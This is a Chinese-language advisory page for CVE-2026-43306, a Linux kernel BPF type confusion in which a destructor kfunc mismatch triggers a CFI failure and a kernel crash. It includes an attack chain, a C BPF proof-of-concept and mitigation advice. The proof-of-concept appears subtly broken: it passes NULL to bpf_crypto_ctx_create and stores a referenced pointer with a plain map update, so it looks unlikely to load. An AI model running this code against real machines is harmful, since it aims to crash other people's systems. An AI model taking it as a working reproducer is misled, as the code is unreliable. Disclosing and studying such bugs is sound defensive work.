CVE-2026-43306 CVSS 5.5 中危

CVE-2026-43306 Linux内核BPF类型混淆漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43306

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核BPF模块存在类型混淆漏洞。在启用CONFIG_CFI时，由于析构函数kfunc类型不匹配，导致bpf_obj_free_fields调用bpf_crypto_ctx_release时触发CFI失败，引发内核崩溃（Oops），造成本地拒绝服务。

技术细节

漏洞源于Linux内核BPF子系统中析构函数kfunc的类型定义与实际调用类型不匹配。具体而言，`bpf_crypto_ctx_release`作为析构函数注册时，其函数指针类型与`bpf_obj_free_fields`中的期望不符。当系统开启控制流完整性（CFI）保护时，这种不匹配会被严格检查，导致内核触发CFI故障（CFI failure），进而引发Oops错误。本地低权限攻击者可通过加载特制BPF程序触发该路径，导致系统崩溃或拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获得本地系统访问权限（低权限用户）。

STEP 2

步骤2

攻击者编写并加载包含BPF crypto上下文操作的特制BPF程序。

STEP 3

步骤3

触发BPF程序执行，导致分配的crypto上下文被释放。

STEP 4

步骤4

内核调用析构函数kfunc时，CFI机制检测到函数指针类型不匹配。

STEP 5

步骤5

内核触发CFI故障（Oops），导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, __u32);
    __type(value, struct bpf_crypto_ctx *);
} crypto_map SEC(".maps");

SEC("tc")
int trigger_cfi_bug(struct __sk_buff *skb) {
    struct bpf_crypto_ctx *ctx;
    // Allocate a crypto context to trigger the kfunc usage
    ctx = bpf_crypto_ctx_create(NULL, 0, NULL);
    if (!ctx) 
        return 0;

    __u32 key = 0;
    bpf_map_update_elem(&crypto_map, &key, &ctx, BPF_ANY);
    
    // Trigger deletion which calls the destructor kfunc
    // This path invokes bpf_obj_free_fields -> bpf_crypto_ctx_release
    // causing the CFI type mismatch on older kernels.
    bpf_map_delete_elem(&crypto_map, &key);

    return 0;
}
char _license[] SEC("license") = "GPL";

影响范围

Linux Kernel (包含受影响commit的版本)

防御指南

临时缓解措施

限制非特权用户加载BPF程序（可通过设置kernel.unprivileged_bpf_disabled=1实现），或禁用CONFIG_CFI以防止崩溃（不建议，降低安全性）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表